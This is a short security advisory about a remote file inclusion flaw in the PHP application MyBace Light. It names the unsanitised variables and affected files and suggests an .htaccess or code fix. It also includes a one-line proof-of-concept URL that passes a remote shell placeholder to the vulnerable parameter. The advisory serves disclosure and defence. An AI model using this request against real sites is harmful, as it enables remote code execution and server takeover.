MyBace Light (hauptverzeichniss) Remote File Inclusion

±-------------------------------------------------------------------
+

• MyBace Light (hauptverzeichniss) Remote File Inclusion
• Original advisory:
• http://www.bb-pcsecurity.de/Websecurity/384/MyBace_Light_(hauptverzeichniss)_Remote_File_Inclusion.htm
  ±-------------------------------------------------------------------
• Affected Software .: My Bace Light
• Venedor …: http://www.onlinemacher.de/
• Class …: Remote File Inclusion
• Risk …: high (Remote File Execution)
• Found by …: Philipp Niedziela
• Contact …: webmaster[at]bb-pcsecurity[.]de

±-------------------------------------------------------------------
+

• Affected Files:
• includes/login_check.php

•       var: $hauptverzeichniss
  

• admin/login/content/user_daten.php

•       var: $template_back
  

±-------------------------------------------------------------------
+

• $hauptverzeichniss & $template_back is not properly sanitized before being used

±-------------------------------------------------------------------
+

• Solution:
• Deny direct access to these files using a .htaccess-file
• or modify code:
• if(!isset($_REQUEST['hauptverzeichniss']) &&
  !isset($_GET['hauptverzeichniss'])

• && !isset($_POST['hauptverzeichniss'])){
  

• //code of org. *.php
• }
• else {
• echo "You cannot access this file directly.";
• die();
• }

±-------------------------------------------------------------------
+

• PoC:
• http://[target]/includes/login_check.php?hauptverzeichniss=[shell]

±-------------------------------------------------------------------
+

• Notice: I've tried to contact venedor 3 weeks ago, but no answer yet…
• Greets: /str0ke

±------------------------[ E O F ]----------------------------------